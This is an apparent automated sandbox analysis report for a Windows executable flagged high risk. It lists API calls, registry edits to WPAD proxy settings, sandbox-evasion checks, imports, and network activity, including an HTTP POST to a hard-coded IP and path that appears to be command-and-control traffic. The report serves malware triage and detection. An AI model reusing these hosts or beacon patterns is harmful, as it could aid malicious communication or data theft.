5.6
High risk

9dade744156b4bf0c64bb9dadc79bc7734ab291a6bcd5c6bc45fdc2e4d341e0f

a006ed72a1635770a9d729ec0c8729a2.exe

Analysis duration

88s

Last analyzed

File size

504.0KB
Static detection Dynamic detection
Hawkeye engine
Not detected No Hawkeye engine detection results available
Static verdict
Antivirus engines
Not detected No antivirus engine detection results available
Static indicators
Queries for the computername (1 event)
Time & API Arguments Status Return Repeated
1620998375.933375
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 events)
Time & API Arguments Status Return Repeated
1620998366.855375
CryptGenKey
crypto_handle: 0x005b62f0
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005b5cb8
flags: 1
key: f^£†SÝdÙ£ìބtƒl£
success 1 0
1620998375.949375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤+‹kMÏAŒfý÷¶‹ædYn´‰@˜:ã1»š›Ù–Ø^æoT¯bfj=yOxkèý”8‹zM/Ðt¤·%“ñ eEÞÈ,áݛÇó˜U–ÏébP·Œ
blob_type: 1
flags: 64
success 1 0
1620998410.839375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤s DüÆOÙL&îŸí¸fQêñ2aejB&þ¼˜ü4Ú)è¥È1V[£âq•³Y÷üBl¯„«N ζ°õ¯U&ú97²@;Ã,œ<GVj°ûoX¥@—åø°>Wéš5„
blob_type: 1
flags: 64
success 1 0
1620998416.418375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤¤9>”[pÖ#ß,åŒÑK6>$¦=… N¹»p$y‹n{æi8®:’Bוý÷I¤i…qÎÞÀ²ð’’©+cµ ¬‰qӜhÄØ4¸R_µö)= MF=
blob_type: 1
flags: 64
success 1 0
1620998419.871375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤}šíÆõQ›ÚÀàñL4•©‰©Ë¹¸Íðü(³†ûÀl^* °®Ëí¬dµ*íRa@ÿùÁäÀBÉw /<c¾3xÙ4‡¿3,¾E’KôŲ& w#Ôښ¼¹³o­Š;‡
blob_type: 1
flags: 64
success 1 0
This executable has a PDB path (1 event)
pdb_path c:\Users\Mr.Anderson\Desktop\2005\27.8.20\CMapEditorCtrl_Demo\Release\MapEd.pdb
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
resource name None
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (1 event)
Time & API Arguments Status Return Repeated
1620998365.980375
NtAllocateVirtualMemory
process_identifier: 784
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00660000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1620998376.511375
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process a006ed72a1635770a9d729ec0c8729a2.exe
Reads the system's User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1620998376.121375
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with host for which no DNS query was performed (5 events)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: ’Êé‹H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620998379.074375
RegSetValueExW
key_handle: 0x000003b8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: ’Êé‹H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620998379.105375
RegSetValueExW
key_handle: 0x000003b4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Connects to IP addresses that are no longer responding to requests (legitimate services will usually remain up and running) (4 events)
dead_host 162.144.42.60:8080
dead_host 192.168.56.101:49178
dead_host 24.26.151.3:80
dead_host 68.183.233.80:8080
Visual analysis
Binary image
No binary image available. No binary visualization image was generated for this sample.
Runtime screenshots
No runtime screenshots available. No screenshots were generated while this sample ran.

PE Compile Time

2020-08-28 14:21:52

Imports

Library KERNEL32.dll:
0x4500f0 GetFileTime
0x4500f4 GetTickCount
0x4500f8 TerminateProcess
0x450104 IsDebuggerPresent
0x450108 RaiseException
0x45010c RtlUnwind
0x450110 HeapAlloc
0x450114 HeapFree
0x450118 HeapReAlloc
0x45011c VirtualProtect
0x450120 GetSystemInfo
0x450124 VirtualQuery
0x450128 GetCommandLineA
0x45012c GetProcessHeap
0x450130 GetStartupInfoA
0x450134 HeapSize
0x450138 Sleep
0x45013c GetACP
0x450140 LCMapStringA
0x450144 LCMapStringW
0x450148 VirtualFree
0x45014c HeapDestroy
0x450150 GetFileAttributesA
0x450154 GetStdHandle
0x450168 SetHandleCount
0x45016c GetFileType
0x450178 GetStringTypeA
0x45017c GetStringTypeW
0x450184 GetConsoleCP
0x450188 GetConsoleMode
0x45018c SetStdHandle
0x450190 WriteConsoleA
0x450194 GetConsoleOutputCP
0x450198 WriteConsoleW
0x4501a4 SetErrorMode
0x4501a8 CreateFileA
0x4501ac GetFullPathNameA
0x4501b4 FindFirstFileA
0x4501b8 FindClose
0x4501bc GetCurrentProcess
0x4501c0 DuplicateHandle
0x4501c4 GetFileSize
0x4501c8 SetEndOfFile
0x4501cc UnlockFile
0x4501d0 LockFile
0x4501d4 FlushFileBuffers
0x4501d8 SetFilePointer
0x4501dc WriteFile
0x4501e0 ReadFile
0x4501ec GetThreadLocale
0x4501f0 GetOEMCP
0x4501f4 GetCPInfo
0x4501fc GlobalFlags
0x450200 TlsFree
0x450208 LocalReAlloc
0x45020c TlsSetValue
0x450210 TlsAlloc
0x450218 GlobalHandle
0x45021c GlobalReAlloc
0x450224 TlsGetValue
0x45022c LocalAlloc
0x450230 GetCurrentProcessId
0x450234 CloseHandle
0x450238 GetCurrentThread
0x450240 GetModuleFileNameA
0x450248 GetLocaleInfoA
0x45024c lstrcmpA
0x450254 GetModuleFileNameW
0x450258 GlobalFree
0x45025c GlobalAlloc
0x450260 GlobalLock
0x450264 GlobalUnlock
0x450268 FormatMessageA
0x45026c LocalFree
0x450270 MulDiv
0x450274 FreeResource
0x450278 GetCurrentThreadId
0x45027c GlobalGetAtomNameA
0x450280 GlobalAddAtomA
0x450284 GlobalFindAtomA
0x450288 GlobalDeleteAtom
0x45028c FreeLibrary
0x450290 LoadLibraryA
0x450294 SetLastError
0x450298 lstrcmpW
0x45029c GetModuleHandleA
0x4502a0 GetProcAddress
0x4502a4 GetVersionExA
0x4502a8 lstrlenA
0x4502ac CompareStringW
0x4502b0 CompareStringA
0x4502b4 GetVersion
0x4502b8 MultiByteToWideChar
0x4502bc InterlockedExchange
0x4502c0 VirtualAlloc
0x4502c4 GetLastError
0x4502c8 ExitProcess
0x4502cc WideCharToMultiByte
0x4502d0 FindResourceA
0x4502d4 LoadResource
0x4502d8 LockResource
0x4502dc HeapCreate
0x4502e0 SizeofResource
Library USER32.dll:
0x450340 IsRectEmpty
0x450344 SetRect
0x450348 InvalidateRgn
0x45034c GetNextDlgGroupItem
0x450350 MessageBeep
0x450358 SetParent
0x45035c GetDCEx
0x450360 LockWindowUpdate
0x450364 PostThreadMessageA
0x450368 SetRectEmpty
0x45036c IsZoomed
0x450374 MapDialogRect
0x450378 GetDesktopWindow
0x450380 GetNextDlgTabItem
0x450384 EndDialog
0x45038c SetCursor
0x450390 GetMessageA
0x450394 TranslateMessage
0x450398 GetActiveWindow
0x45039c ValidateRect
0x4503a0 PostQuitMessage
0x4503a4 InflateRect
0x4503a8 EndPaint
0x4503ac BeginPaint
0x4503b0 GetWindowDC
0x4503b4 ClientToScreen
0x4503b8 GrayStringA
0x4503bc DrawTextExA
0x4503c0 DrawTextA
0x4503c4 TabbedTextOutA
0x4503c8 IsWindowEnabled
0x4503cc MoveWindow
0x4503d0 SetWindowTextA
0x4503d4 IsDialogMessageA
0x4503d8 SetDlgItemInt
0x4503dc GetDlgItemInt
0x4503e0 SetMenuItemBitmaps
0x4503e8 ModifyMenuA
0x4503ec CharNextA
0x4503f0 EnableMenuItem
0x4503f4 CheckMenuItem
0x4503fc SendDlgItemMessageA
0x450400 WinHelpA
0x450404 IsChild
0x450408 GetCapture
0x45040c SetWindowsHookExA
0x450410 CallNextHookEx
0x450414 GetClassLongA
0x450418 GetClassNameA
0x45041c SetPropA
0x450420 GetPropA
0x450424 RemovePropA
0x450428 GetFocus
0x45042c IsWindow
0x450430 SetFocus
0x450434 GetWindowTextA
0x450438 GetForegroundWindow
0x45043c GetLastActivePopup
0x450440 SetActiveWindow
0x450444 DispatchMessageA
0x450448 BeginDeferWindowPos
0x45044c EndDeferWindowPos
0x450450 GetDlgItem
0x450454 GetTopWindow
0x450458 DestroyWindow
0x45045c UnhookWindowsHookEx
0x450460 GetMessageTime
0x450464 GetMessagePos
0x450468 PeekMessageA
0x45046c MapWindowPoints
0x450470 GetKeyState
0x450474 GetScrollRange
0x450478 SetScrollPos
0x45047c GetScrollPos
0x450480 SetForegroundWindow
0x450484 ShowScrollBar
0x450488 IsWindowVisible
0x45048c UpdateWindow
0x450490 GetMenu
0x450494 PostMessageA
0x450498 GetSubMenu
0x45049c GetMenuItemID
0x4504a0 DrawStateA
0x4504a4 EqualRect
0x4504a8 DrawFocusRect
0x4504ac GetClientRect
0x4504b0 ScreenToClient
0x4504b4 GetDC
0x4504b8 GetMenuItemCount
0x4504bc GetClassInfoExA
0x4504c0 RegisterClassA
0x4504c4 GetSysColor
0x4504c8 AdjustWindowRectEx
0x4504cc GetParent
0x4504d0 DeferWindowPos
0x4504d4 CopyRect
0x4504d8 GetScrollInfo
0x4504dc SetScrollInfo
0x4504e0 PtInRect
0x4504e4 GetDlgCtrlID
0x4504e8 ReleaseCapture
0x4504ec WindowFromPoint
0x4504f0 CallWindowProcA
0x4504f4 GetWindowLongA
0x4504f8 SetCapture
0x4504fc UnregisterClassA
0x450500 DestroyMenu
0x450504 GetMenuState
0x450508 ReleaseDC
0x45050c EnableScrollBar
0x450510 SetTimer
0x450514 KillTimer
0x450518 EnableWindow
0x45051c LoadCursorA
0x450520 GetCursorPos
0x450524 GetSysColorBrush
0x450528 DefWindowProcA
0x45052c GetClassInfoA
0x450530 InSendMessage
0x450534 CreateWindowExA
0x450538 SendMessageA
0x45053c ShowWindow
0x450540 MessageBoxA
0x450544 LoadStringA
0x450548 DrawIcon
0x45054c IsIconic
0x450550 InvalidateRect
0x450554 LoadIconA
0x450558 GetSystemMetrics
0x45055c LoadBitmapA
0x450560 CharUpperA
0x450564 GetWindow
0x450568 GetWindowRect
0x45056c GetWindowPlacement
0x450574 IntersectRect
0x450578 OffsetRect
0x45057c SetWindowPos
0x450580 SetWindowLongA
Library GDI32.dll:
0x450030 ExtSelectClipRgn
0x450034 DeleteDC
0x450038 CreatePatternBrush
0x45003c GetStockObject
0x450040 ScaleWindowExtEx
0x450048 SetRectRgn
0x45004c CombineRgn
0x450050 GetMapMode
0x450054 PatBlt
0x450058 GetTextMetricsA
0x450060 GetBkColor
0x450064 GetTextColor
0x450068 GetRgnBox
0x45006c GetWindowExtEx
0x450070 GetViewportExtEx
0x450074 SetWindowExtEx
0x450078 ScaleViewportExtEx
0x45007c SetViewportExtEx
0x450080 OffsetViewportOrgEx
0x450084 SetViewportOrgEx
0x450088 Escape
0x45008c ExtTextOutA
0x450090 TextOutA
0x450094 RectVisible
0x450098 PtVisible
0x45009c CreatePen
0x4500a0 CreateRectRgn
0x4500a4 SelectClipRgn
0x4500a8 DeleteObject
0x4500ac IntersectClipRect
0x4500b0 ExcludeClipRect
0x4500b4 SetMapMode
0x4500b8 RestoreDC
0x4500bc SaveDC
0x4500c0 GetDeviceCaps
0x4500c4 CreateBitmap
0x4500c8 GetObjectA
0x4500cc SetBkColor
0x4500d0 SetTextColor
0x4500d4 GetClipBox
0x4500d8 BitBlt
0x4500dc Polyline
0x4500e0 SelectObject
0x4500e4 CreateCompatibleDC
Library MSIMG32.dll:
0x4502e8 TransparentBlt
Library comdlg32.dll:
0x450598 GetFileTitleA
Library WINSPOOL.DRV:
0x450588 DocumentPropertiesA
0x45058c OpenPrinterA
0x450590 ClosePrinter
Library ADVAPI32.dll:
0x450000 RegEnumKeyA
0x450004 RegSetValueExA
0x450008 RegCreateKeyExA
0x45000c RegQueryValueA
0x450010 RegCloseKey
0x450014 RegDeleteKeyA
0x450018 RegOpenKeyExA
0x45001c RegQueryValueExA
0x450020 RegOpenKeyA
Library COMCTL32.dll:
0x450028
Library SHLWAPI.dll:
0x450328 PathFindFileNameA
0x45032c PathStripToRootA
0x450330 PathFindExtensionA
0x450334 PathIsUNCA
Library oledlg.dll:
0x4505e0
Library ole32.dll:
0x4505a0 OleInitialize
0x4505a8 OleUninitialize
0x4505b8 CoGetClassObject
0x4505bc CLSIDFromString
0x4505c0 CoRevokeClassObject
0x4505c4 CoTaskMemAlloc
0x4505c8 CoTaskMemFree
0x4505d0 OleFlushClipboard
0x4505d8 CLSIDFromProgID
Library OLEAUT32.dll:
0x4502f0 VariantChangeType
0x4502f4 VariantInit
0x4502f8 SysAllocStringLen
0x4502fc SysStringLen
0x450300 SysFreeString
0x450308 VariantCopy
0x45030c VariantClear
0x450310 SafeArrayDestroy
0x450320 SysAllocString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49238 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62319 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/krvfYI0FI0F/HUOnGVZI0DSF/BY0PTCm/OB2Ym8Yhxa95lNu34GI/
POST /krvfYI0FI0F/HUOnGVZI0DSF/BY0PTCm/OB2Ym8Yhxa95lNu34GI/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------1d4f49aa4b5964861f9e41b3765efa27
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.